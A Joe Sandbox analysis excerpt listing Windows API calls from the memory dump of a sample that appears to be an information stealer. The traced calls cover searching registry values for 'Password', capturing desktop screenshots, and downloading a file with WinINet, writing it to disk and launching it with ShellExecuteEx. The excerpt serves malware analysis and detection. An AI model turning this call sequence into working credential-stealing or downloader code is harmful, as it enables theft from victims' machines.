                                    • lstrlen.KERNEL32(?), ref: 00F816D9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F816F6
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F81704
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8172A
                                    • lstrlen.KERNEL32(00A9A710), ref: 00F8173F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81762
                                    • lstrcat.KERNEL32(00000000,00A9A710), ref: 00F8176A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81792
                                    • ShellExecuteEx.SHELL32(?), ref: 00F817CD
                                    • ExitProcess.KERNEL32 ref: 00F81803
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                    • String ID: <
                                    • API String ID: 3579039295-4251816714
                                    • Opcode ID: 83a79e91f27b4d9d4abbbac48e0f2e8ec9df0fb9fa422ae1f12a1f1f59b1c298
                                    • Instruction ID: aff4db2849fb32f1dfabffb2fdb0d258acf97edcec9d8a42e156dcf70d6eb2c8
                                    • Opcode Fuzzy Hash: 83a79e91f27b4d9d4abbbac48e0f2e8ec9df0fb9fa422ae1f12a1f1f59b1c298
                                    • Instruction Fuzzy Hash: 1B51B370D01619ABDB25EFA4C884ADEB7FDBF48310F044139E525E3245EB34AE42DB90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EFE4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F012
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F7F026
                                    • lstrlen.KERNEL32(00000000), ref: 00F7F035
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00F7F053
                                    • StrStrA.SHLWAPI(00000000,?), ref: 00F7F081
                                    • lstrlen.KERNEL32(?), ref: 00F7F094
                                    • lstrlen.KERNEL32(00000000), ref: 00F7F0B2
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 00F7F0FF
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 00F7F13F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$AllocLocal
                                    • String ID: ERROR
                                    • API String ID: 1803462166-2861137601
                                    • Opcode ID: 99b6f779a987417000370b1980cfbc12f8348624c45d74d83fe6035fb040d7b0
                                    • Instruction ID: b942caf72a872980201b775a1571e0118075d0e202d5184f1a12f82ded5cc820
                                    • Opcode Fuzzy Hash: 99b6f779a987417000370b1980cfbc12f8348624c45d74d83fe6035fb040d7b0
                                    • Instruction Fuzzy Hash: FE51C131D116059FCB31EF74DC59AAE77A4AF55310F08807AF85ADB202DB78EC05AB92
                                    APIs
                                    • GetEnvironmentVariableA.KERNEL32(00A99078,01199BD8,0000FFFF), ref: 00F6A026
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6A053
                                    • lstrlen.KERNEL32(01199BD8), ref: 00F6A060
                                    • lstrcpy.KERNEL32(00000000,01199BD8), ref: 00F6A08A
                                    • lstrlen.KERNEL32(00F94C4C), ref: 00F6A095
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6A0B2
                                    • lstrcat.KERNEL32(00000000,00F94C4C), ref: 00F6A0BE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6A0E4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6A0EF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6A114
                                    • SetEnvironmentVariableA.KERNEL32(00A99078,00000000), ref: 00F6A12F
                                    • LoadLibraryA.KERNEL32(00A9DE30), ref: 00F6A143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                    • String ID:
                                    • API String ID: 2929475105-0
                                    • Opcode ID: 24ba1cd18ee03a0947b824e8755eafc5db5b0ecb59393bf50d2a1a3e5e9e913b
                                    • Instruction ID: 365022f1ef516e4b7d7a77669b4a0f65363db49a0c0e04c259b8384ee4c63b31
                                    • Opcode Fuzzy Hash: 24ba1cd18ee03a0947b824e8755eafc5db5b0ecb59393bf50d2a1a3e5e9e913b
                                    • Instruction Fuzzy Hash: 69914730A00A149FD734AFA4DC95A6637B5FB95724F440138E5369B246EBB9CC80EF92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7C8A2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7C8D1
                                    • lstrlen.KERNEL32(00000000), ref: 00F7C8FC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7C932
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F7C943
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 4b0eac5e62435fd9e35aefa9e7d03d31dc1ebcbd5cb5c3c43a9dd1fc1e651d7c
                                    • Instruction ID: 4ed022ff79ec29462d47158a4d8c154e9a821819a654cfe295fe07801162d731
                                    • Opcode Fuzzy Hash: 4b0eac5e62435fd9e35aefa9e7d03d31dc1ebcbd5cb5c3c43a9dd1fc1e651d7c
                                    • Instruction Fuzzy Hash: 0E61E471D112199BEB20EFB5CC45AAE7BF8BF49315F04802EE815E7201D7789D41ABE2
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00F80CF0), ref: 00F84276
                                    • GetDesktopWindow.USER32 ref: 00F84280
                                    • GetWindowRect.USER32(00000000,?), ref: 00F8428D
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F842BF
                                    • GetHGlobalFromStream.COMBASE(00F80CF0,?), ref: 00F84336
                                    • GlobalLock.KERNEL32(?), ref: 00F84340
                                    • GlobalSize.KERNEL32(?), ref: 00F8434D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                    • String ID:
                                    • API String ID: 1264946473-0
                                    • Opcode ID: ee2bd03f9c045ef7fc7d71281cf12f35d00b053cfb40894983b4eb0b4c9ce3f1
                                    • Instruction ID: 0cc7f57ded28736e776d8cf9981231582ddbbbc576fbe6db3d46382e840259e4
                                    • Opcode Fuzzy Hash: ee2bd03f9c045ef7fc7d71281cf12f35d00b053cfb40894983b4eb0b4c9ce3f1
                                    • Instruction Fuzzy Hash: FF51407191020CAFDB24EFA4DD89AEEB7B9FF48314F144029F925E3244DB74AD419BA1
                                    APIs
                                    • lstrcat.KERNEL32(?,00A9E490), ref: 00F7E00D
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7E037
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E07D
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E098
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0AC
                                    • lstrcat.KERNEL32(?,00A8B860), ref: 00F7E0C0
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0D4
                                    • lstrcat.KERNEL32(?,00A9DCF0), ref: 00F7E0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F7E126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 4230089145-0
                                    • Opcode ID: 4ba9a64f4f87ddc09778c3288ddd40a01637c59057926e935d489f14862de2b0
                                    • Instruction ID: 702718dc4478e4a54e2134d8919c22359c91f138d6c382ae503f3cb40dda5113
                                    • Opcode Fuzzy Hash: 4ba9a64f4f87ddc09778c3288ddd40a01637c59057926e935d489f14862de2b0
                                    • Instruction Fuzzy Hash: 4A61B071D1011CDBCB65DB64CC45ADDB3B8BF4C310F1489AAA629A3240DBB49F85AF90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F66AFF
                                    • InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F66B2C
                                    • StrCmpCA.SHLWAPI(?,00A9E928), ref: 00F66B4A
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00F66B6A
                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F66B88
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F66BA1
                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00F66BC6
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F66BF0
                                    • CloseHandle.KERNEL32(00000000), ref: 00F66C10
                                    • InternetCloseHandle.WININET(00000000), ref: 00F66C17
                                    • InternetCloseHandle.WININET(?), ref: 00F66C21
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                    • String ID:
                                    • API String ID: 2500263513-0
                                    • Opcode ID: 4ef3502726b3bcc3bcb43ce95800e57e111ccea2bc96ffec3eed404e3eee4693
                                    • Instruction ID: 427076e8fdf1aea6002ccb31b527d6cc438a7275ae25787a4a1948725998b205
                                    • Opcode Fuzzy Hash: 4ef3502726b3bcc3bcb43ce95800e57e111ccea2bc96ffec3eed404e3eee4693
                                    • Instruction Fuzzy Hash: 4941A3B1A00209EBDB24DF64DC49FAE77B8EF44705F004568FA15E7280EB70AD409BA4
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6BC1F
                                    • lstrlen.KERNEL32(00000000), ref: 00F6BC52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6BC7C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6BC84
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6BCAC
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F6BD23
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 9478d4f23db6d7dbcce452b26d969c1321bfd31e699c82486812b81b400de834
                                    • Instruction ID: b8ebd07fcac81b751cd39896a68aabe57839292d3c1148f317ef3ae2d40dc48e
                                    • Opcode Fuzzy Hash: 9478d4f23db6d7dbcce452b26d969c1321bfd31e699c82486812b81b400de834
                                    • Instruction Fuzzy Hash: 79A19070A112098FCB75DF68D949AAEB7B4BF44324F18807DE415DB251DB3ADC82EB50
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85F2A
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85F49
                                    • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00F86014
                                    • memmove.MSVCRT(00000000,00000000,?), ref: 00F8609F
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F860D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$memmove
                                    • String ID: invalid string position$string too long
                                    • API String ID: 1975243496-4289949731
                                    • Opcode ID: 95e74475eefac5f6460a8f0a95067e0c382f7151fb9f41c4cd57591e9e5799e9
                                    • Instruction ID: fd10314d223db3973aa462d16bb7bf04bd3ee27480863bb2acb6eb09afd6bda7
                                    • Opcode Fuzzy Hash: 95e74475eefac5f6460a8f0a95067e0c382f7151fb9f41c4cd57591e9e5799e9
                                    • Instruction Fuzzy Hash: 2E619F71B00544DBDB18EF5CCC94AAEB7B6EF84704B244A19E592CB381D731ED80AB99
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E07D
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E098
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0AC
                                    • lstrcat.KERNEL32(?,00A8B860), ref: 00F7E0C0
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0D4
                                    • lstrcat.KERNEL32(?,00A9DCF0), ref: 00F7E0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F7E126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                    • String ID:
                                    • API String ID: 3428472996-0
                                    • Opcode ID: d14c68538c9452ff14c2c915425607501c65340ec231409d9d6a13e880478719
                                    • Instruction ID: ad6a997f233d869bc5c57534b5d4a9ee30de0faee61a073a51a1fa60af4ce6e2
                                    • Opcode Fuzzy Hash: d14c68538c9452ff14c2c915425607501c65340ec231409d9d6a13e880478719
                                    • Instruction Fuzzy Hash: 2E41E271D1011C9BCB65EB64DC49ADD73B8BF4C310F4489AAF52A93200DBB89F85AF90
                                    APIs
                                      • Part of subcall function 00F677D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F67805
                                      • Part of subcall function 00F677D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00F6784A
                                      • Part of subcall function 00F677D0: StrStrA.SHLWAPI(?,Password), ref: 00F678B8
                                      • Part of subcall function 00F677D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F678EC
                                      • Part of subcall function 00F677D0: HeapFree.KERNEL32(00000000), ref: 00F678F3
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F67A90
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F67ABD
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00F67ACF
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F67AF0
                                    • wsprintfA.USER32 ref: 00F67B10
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F67B39
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F67B47
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F67B60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                    • String ID: :
                                    • API String ID: 398153587-3653984579
                                    • Opcode ID: 39df2105952512819b3bdbfdd8249fef7e77572b2f13781b13ad2dea91bf321e
                                    • Instruction ID: 4444eeb7de55ca2704a94d537ae53e30d58c8f2aba0b7c533671de4025cc019b
                                    • Opcode Fuzzy Hash: 39df2105952512819b3bdbfdd8249fef7e77572b2f13781b13ad2dea91bf321e
                                    • Instruction Fuzzy Hash: 4031C572A0421CAFCB24EFA8D844DAFB779EB8471CB18052DE52593204DB75E985EB60
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F7820C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78243
                                    • lstrlen.KERNEL32(00000000), ref: 00F78260
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78297
                                    • lstrlen.KERNEL32(00000000), ref: 00F782B4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F782EB
                                    • lstrlen.KERNEL32(00000000), ref: 00F78308
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78337
                                    • lstrlen.KERNEL32(00000000), ref: 00F78351
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F78380
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
